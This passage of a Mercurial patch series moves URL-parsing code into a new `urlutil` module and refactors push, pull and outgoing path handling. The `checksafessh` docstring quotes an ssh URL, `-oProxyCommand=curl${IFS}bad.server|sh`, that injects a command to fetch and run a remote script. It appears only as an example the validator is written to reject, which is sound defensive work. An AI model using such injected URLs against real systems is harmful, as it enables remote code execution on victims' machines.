'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. + if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + class paths(dict): """Represents a collection of paths and their configs. @@ -103,7 +530,7 @@ @pathsuboption(b'pushurl', b'pushloc') def pushurlpathoption(ui, path, value): - u = util.url(value) + u = url(value) # Actually require a URL. if not u.scheme: ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) @@ -148,7 +575,7 @@ raise ValueError(b'rawloc must be defined') # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) + u = url(rawloc) branch = None if u.fragment: branch = u.fragment diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ ('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort -*** Test urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618202094 -7200 # Mon Apr 12 06:34:54 2021 +0200 # Node ID 4452cb7884042b769202ba58382f49e028ea6c25 # Parent ffd3e823a7e543d20c00799a71a75f820e4702d8 urlutil: extract `parseurl` from `hg` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. Differential Revision: https://phab.mercurial-scm.org/D10375 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1042,7 +1042,7 @@ if opts is None: opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = hg.parseurl(dest, None)[:2] + dest, branches = urlutil.parseurl(dest, None)[:2] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -116,6 +116,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from mercurial import ( @@ -683,7 +684,9 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.parseurl( + ui.expandpath(source), opts.get(b'branch') + ) scratchbookmarks = {} unfi = repo.unfiltered() diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -43,12 +43,12 @@ # meaning the current directory. if repo is None: path = ui.expandpath(b'default') - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo else: - path, _branches = hg.parseurl(path) + path, _branches = urlutil.parseurl(path) remote = hg.peer(repo or ui, {}, path) # The path could be a scheme so use Mercurial's normal functionality diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -594,7 +594,7 @@ # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. remotepath = ui.expandpath(remotepath or b'default') - url, branches = hg.parseurl(remotepath) + url, branches = urlutil.parseurl(remotepath) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -531,7 +531,7 @@ '''Return the revisions present locally but not in dest''' ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') - url = hg.parseurl(url)[0] + url = urlutil.parseurl(url)[0] ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1614,7 +1614,7 @@ outgoing = discovery.outgoing(repo, common, heads) else: dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = hg.parseurl(dest, opts.get(b'branch')) + dest, branches = urlutil.parseurl(dest, opts.get(b'branch')) other = hg.peer(repo, opts, dest) revs = [repo[r].hex() for r in revs] revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) @@ -3841,7 +3841,7 @@ peer = None try: if source: - source, branches = hg.parseurl(ui.expandpath(source)) + source, branches = urlutil.parseurl(ui.expandpath(source)) # only pass ui when no repo peer = hg.peer(repo or ui, opts, source) repo = peer.local() @@ -4311,7 +4311,7 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = hg.parseurl( + source, branches = urlutil.parseurl( ui.expandpath(source), opts.get(b'branch') ) other = hg.peer(repo, opts, source) @@ -5390,7 +5390,7 @@ if not sources: sources = [b'default'] for source in sources: - source, branches = hg.parseurl( + source, branches = urlutil.parseurl( ui.expandpath(source), opts.get(b'branch') ) ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) @@ -7225,7 +7225,7 @@ return def getincoming(): - source, branches = hg.parseurl(ui.expandpath(b'default')) + source, branches = urlutil.parseurl(ui.expandpath(b'default')) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7248,7 +7248,9 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default')) + dest, branches = urlutil.parseurl( + ui.expandpath(b'default-push', b'default') + ) dbranch = branches[0] revs, checkout = hg.addbranchrevs(repo, repo, branches, None) if source != dest: diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1060,7 +1060,7 @@ if not remote_revs: - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) + remoteurl, branches = urlutil.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: @@ -3652,7 +3652,7 @@ ) source = b"default" - source, branches = hg.parseurl(ui.expandpath(source)) + source, branches = urlutil.parseurl(ui.expandpath(source)) url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} @@ -3762,7 +3762,7 @@ for backup in backups: # Much of this is copied from the hg incoming logic source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = hg.parseurl(source, opts.get(b"branch")) + source, branches = urlutil.parseurl(source, opts.get(b"branch")) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -132,13 +132,9 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - - u = urlutil.url(path) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - return bytes(u), (branch, branches or []) + msg = b'parseurl(...) moved to mercurial.utils.urlutil' + util.nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.parseurl(path, branches=branches) schemes = { @@ -285,7 +281,7 @@ # the sharedpath always ends in the .hg; we want the path to the repo source = repo.vfs.split(repo.sharedpath)[0] - srcurl, branches = parseurl(source) + srcurl, branches = urlutil.parseurl(source) srcrepo = repository(repo.ui, srcurl) repo.srcrepo = srcrepo return srcrepo @@ -312,7 +308,7 @@ if isinstance(source, bytes): origsource = ui.expandpath(source) - source, branches = parseurl(origsource) + source, branches = urlutil.parseurl(origsource) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: @@ -676,7 +672,7 @@ if isinstance(source, bytes): origsource = ui.expandpath(source) - source, branches = parseurl(origsource, branch) + source, branches = urlutil.parseurl(origsource, branch) srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo @@ -1266,7 +1262,9 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. """ - source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) + source, branches = urlutil.parseurl( + ui.expandpath(source), opts.get(b'branch') + ) other = peer(repo, opts, source) cleanupfn = other.close try: diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -41,6 +41,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) # helpers for processing parsed tree @@ -2122,7 +2123,7 @@ # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) dest = repo.ui.expandpath(dest or b'default') - dest, branches = hg.parseurl(dest) + dest, branches = urlutil.parseurl(dest) other = hg.peer(repo, {}, dest) n = other.lookup(q) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -445,6 +445,16 @@ return bytes(u) +def parseurl(path, branches=None): + '''parse url#branch, returning (url, (branch, branches))''' + u = url(path) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + return bytes(u), (branch, branches or []) + + class paths(dict): """Represents a collection of paths and their configs. diff --git a/tests/test-hg-parseurl.py b/tests/test-hg-parseurl.py --- a/tests/test-hg-parseurl.py +++ b/tests/test-hg-parseurl.py @@ -2,44 +2,48 @@ import unittest -from mercurial import hg +from mercurial.utils import urlutil class ParseRequestTests(unittest.TestCase): def testparse(self): self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor'), + urlutil.parseurl(b'http://example.com/no/anchor'), (b'http://example.com/no/anchor', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor#foo'), + urlutil.parseurl(b'http://example.com/an/anchor#foo'), (b'http://example.com/an/anchor', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']), + urlutil.parseurl( + b'http://example.com/no/anchor/branches', [b'foo'] + ), (b'http://example.com/no/anchor/branches', (None, [b'foo'])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']), + urlutil.parseurl( + b'http://example.com/an/anchor/branches#bar', [b'foo'] + ), (b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])), ) self.assertEqual( - hg.parseurl( + urlutil.parseurl( b'http://example.com/an/anchor/branches-None#foo', None ), (b'http://example.com/an/anchor/branches-None', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/'), + urlutil.parseurl(b'http://example.com/'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com'), + urlutil.parseurl(b'http://example.com'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com#foo'), + urlutil.parseurl(b'http://example.com#foo'), (b'http://example.com/', (b'foo', [])), ) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618258976 -7200 # Mon Apr 12 22:22:56 2021 +0200 # Node ID 067840864f370c72fdfb7de4f0049d370f15dad7 # Parent 4452cb7884042b769202ba58382f49e028ea6c25 urlutil: add a `get_push_paths` to perform the push destination logic As is this changeset does not change anything. However having an official empty point will help unifying the logic and encapsulate the details and update the logic to support path definition pointing to multiple other path. Differential Revision: https://phab.mercurial-scm.org/D10377 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5720,12 +5720,9 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - if not dests: - dests = [None] some_pushed = False result = 0 - for dest in dests: - path = ui.getpath(dest, default=(b'default-push', b'default')) + for path in urlutil.get_push_paths(repo, ui, dests): if not path: raise error.ConfigError( _(b'default repository not configured!'), diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -445,6 +445,14 @@ return bytes(u) +def get_push_paths(repo, ui, dests): + """yields all the `path` selected as push destination by `dests`""" + if not dests: + dests = [None] + for dest in dests: + yield ui.getpath(dest, default=(b'default-push', b'default')) + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618309724 -7200 # Tue Apr 13 12:28:44 2021 +0200 # Node ID df7439cc6806eae92fd769913bdd8a1b7e2fdae5 # Parent 067840864f370c72fdfb7de4f0049d370f15dad7 urlutil: add a `get_pull_paths` to perform the pull destination logic As is this changeset does not change anything. However having an official empty point will help unifying the logic and encapsulate the details and update the logic to support path definition pointing to multiple other path. Differential Revision: https://phab.mercurial-scm.org/D10378 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5387,12 +5387,8 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - if not sources: - sources = [b'default'] - for source in sources: - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) + sources = urlutil.get_pull_paths(repo, ui, sources, opts.get(b'branch')) + for source, branches in sources: ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -453,6 +453,15 @@ yield ui.getpath(dest, default=(b'default-push', b'default')) +def get_pull_paths(repo, ui, sources, default_branches=()): + """yields all the `(path, branch)` selected as pull source by `sources`""" + if not sources: + sources = [b'default'] + for source in sources: + url = ui.expandpath(source) + yield parseurl(url, default_branches) + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618084501 -7200 # Sat Apr 10 21:55:01 2021 +0200 # Node ID 6071bfab629204eea9ac170bf0359c0d39d39964 # Parent df7439cc6806eae92fd769913bdd8a1b7e2fdae5 infinitepush: use the new function to determine push destination Since 066b8d8f75b8, the push command accept multiple destination. `infinitepush` was not aware of that. We now use the new `urlutil.get_push_paths` function to determine the push destination, fixing the issue. This will also make future evolution of that logic transparent for infinitepush We still disallow push to multiple destinations if infinite push is enabled because I don't know what this means for infinite push. However user will now get a clear error message instead of a crash. Differential Revision: https://phab.mercurial-scm.org/D10379 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -811,7 +811,7 @@ return common, True, remoteheads -def _push(orig, ui, repo, dest=None, *args, **opts): +def _push(orig, ui, repo, *dests, **opts): opts = pycompat.byteskwargs(opts) bookmark = opts.get(b'bookmark') # we only support pushing one infinitepush bookmark at once @@ -839,18 +839,18 @@ oldphasemove = extensions.wrapfunction( exchange, b'_localphasemove', _phasemove ) - # Copy-paste from `push` command - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) + + paths = list(urlutil.get_push_paths(repo, ui, dests)) + if len(paths) > 1: + msg = _(b'cannot push to multiple path with infinitepush') + raise error.Abort(msg) + + path = paths[0] destpath = path.pushloc or path.loc # Remote scratch bookmarks will be deleted because remotenames doesn't # know about them. Let's save it before push and restore after remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath) - result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts)) + result = orig(ui, repo, *dests, **pycompat.strkwargs(opts)) if common.isremotebooksenabled(ui): if bookmark and scratchpush: other = hg.peer(repo, opts, destpath) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618161614 -7200 # Sun Apr 11 19:20:14 2021 +0200 # Node ID 627bb1875fee6ade373d319c8fba56a2a781f1e3 # Parent 6071bfab629204eea9ac170bf0359c0d39d39964 outgoing: remove some early return Since 066b8d8f75b8, the push command accept multiple destination. However `hg outgoing` does not. On the way to fix this, we need to clean up the outgoing code. We start with removing some early return to make the code ready to house more changes. Differential Revision: https://phab.mercurial-scm.org/D10380 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1360,28 +1360,28 @@ limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) + ret = 1 try: - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() + if o: + ret = 0 - if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 - displayer.show(repo[n]) - displayer.close() + if opts.get(b'newest_first'): + o.reverse() + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + count = 0 + for n in o: + if limit is not None and count >= limit: + break + parents = [p for p in repo.changelog.parents(n) if p != nullid] + if opts.get(b'no_merges') and len(parents) == 2: + continue + count += 1 + displayer.show(repo[n]) + displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + ret = min(ret, recurse()) + return ret # exit code is zero since we found outgoing changes finally: other.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618162263 -7200 # Sun Apr 11 19:31:03 2021 +0200 # Node ID b2740c54724343e20197cc53653743dae3957456 # Parent 627bb1875fee6ade373d319c8fba56a2a781f1e3 outgoing: make `recurse` a real function If we want to use this in a loop, we need to be able to pass argument. Differential Revision: https://phab.mercurial-scm.org/D10381 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1348,15 +1348,17 @@ raise +def _outgoing_recurse(ui, repo, dest, opts): + ret = 1 + if opts.get(b'subrepos'): + ctx = repo[None] + for subpath in sorted(ctx.substate): + sub = ctx.sub(subpath) + ret = min(ret, sub.outgoing(ui, dest, opts)) + return ret + + def outgoing(ui, repo, dest, opts): - def recurse(): - ret = 1 - if opts.get(b'subrepos'): - ctx = repo[None] - for subpath in sorted(ctx.substate): - sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) - return ret limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) @@ -1380,7 +1382,7 @@ displayer.show(repo[n]) displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) - ret = min(ret, recurse()) + ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) return ret # exit code is zero since we found outgoing changes finally: other.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618319600 -7200 # Tue Apr 13 15:13:20 2021 +0200 # Node ID 50b79f8b802d67d02e42f8b82e6a896666d2ede1 # Parent b2740c54724343e20197cc53653743dae3957456 outgoing: move filtering logic in its own function This move code dedicated to a single purpose together and make the main code simpler. Right when we are getting ready to make it more complex :-D Differential Revision: https://phab.mercurial-scm.org/D10382 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1358,27 +1358,40 @@ return ret +def _outgoing_filter(repo, revs, opts): + """apply revision filtering/ordering option for outgoing""" + limit = logcmdutil.getlimit(opts) + no_merges = opts.get(b'no_merges') + if opts.get(b'newest_first'): + revs.reverse() + if limit is None and not no_merges: + for r in revs: + yield r + return + + count = 0 + cl = repo.changelog + for n in revs: + if limit is not None and count >= limit: + break + parents = [p for p in cl.parents(n) if p != nullid] + if no_merges and len(parents) == 2: + continue + count += 1 + yield n + + def outgoing(ui, repo, dest, opts): - limit = logcmdutil.getlimit(opts) o, other = _outgoing(ui, repo, dest, opts) ret = 1 try: if o: ret = 0 - if opts.get(b'newest_first'): - o.reverse() ui.pager(b'outgoing') displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - count = 0 - for n in o: - if limit is not None and count >= limit: - break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: - continue - count += 1 + for n in _outgoing_filter(repo, o, opts): displayer.show(repo[n]) displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618164046 -7200 # Sun Apr 11 20:00:46 2021 +0200 # Node ID efc6f6a794bd4b3529cec4a29c4cd7cb997e094d # Parent 50b79f8b802d67d02e42f8b82e6a896666d2ede1 outgoing: merge the code handling --graph with the main one The --graph code had its own copy of the logic. With the previous reorganisation of the code, we can now merge it with the main code, reducing fragile complication. As a side effect, `hg out --graph` now use the right return code when they are nothing outgoing. This explain the change to output in `tests/test-largefiles-misc.t`. Differential Revision: https://phab.mercurial-scm.org/D10383 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4972,22 +4972,6 @@ ) opts = pycompat.byteskwargs(opts) - if opts.get(b'graph'): - logcmdutil.checkunsupportedgraphflags([], opts) - o, other = hg._outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return - - revdag = logcmdutil.graphrevs(repo, o, opts) - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts, buffered=True) - logcmdutil.displaygraph( - ui, repo, revdag, displayer, graphmod.asciiedges - ) - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return 0 - if opts.get(b'bookmarks'): dest = path.pushloc or path.loc other = hg.peer(repo, opts, dest) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -32,6 +32,7 @@ error, exchange, extensions, + graphmod, httppeer, localrepo, lock, @@ -1382,18 +1383,29 @@ def outgoing(ui, repo, dest, opts): - + if opts.get(b'graph'): + logcmdutil.checkunsupportedgraphflags([], opts) o, other = _outgoing(ui, repo, dest, opts) ret = 1 try: if o: ret = 0 - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) - for n in _outgoing_filter(repo, o, opts): - displayer.show(repo[n]) - displayer.close() + if opts.get(b'graph'): + revdag = logcmdutil.graphrevs(repo, o, opts) + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer( + ui, repo, opts, buffered=True + ) + logcmdutil.displaygraph( + ui, repo, revdag, displayer, graphmod.asciiedges + ) + else: + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + for n in _outgoing_filter(repo, o, opts): + displayer.show(repo[n]) + displayer.close() cmdutil.outgoinghooks(ui, repo, other, opts, o) ret = min(ret, _outgoing_recurse(ui, repo, dest, opts)) return ret # exit code is zero since we found outgoing changes diff --git a/tests/test-largefiles-misc.t b/tests/test-largefiles-misc.t --- a/tests/test-largefiles-misc.t +++ b/tests/test-largefiles-misc.t @@ -675,6 +675,7 @@ searching for changes no changes found largefiles: no files to upload + [1] check messages when there are files to upload: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618320779 -7200 # Tue Apr 13 15:32:59 2021 +0200 # Node ID 7061eee84151b4c7118c5b435840dab1bd305bc5 # Parent efc6f6a794bd4b3529cec4a29c4cd7cb997e094d push-dests: rework the handling of default value This new core is more straightforward and doing this early will make the next changeset simpler. Differential Revision: https://phab.mercurial-scm.org/D10384 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -448,9 +448,15 @@ def get_push_paths(repo, 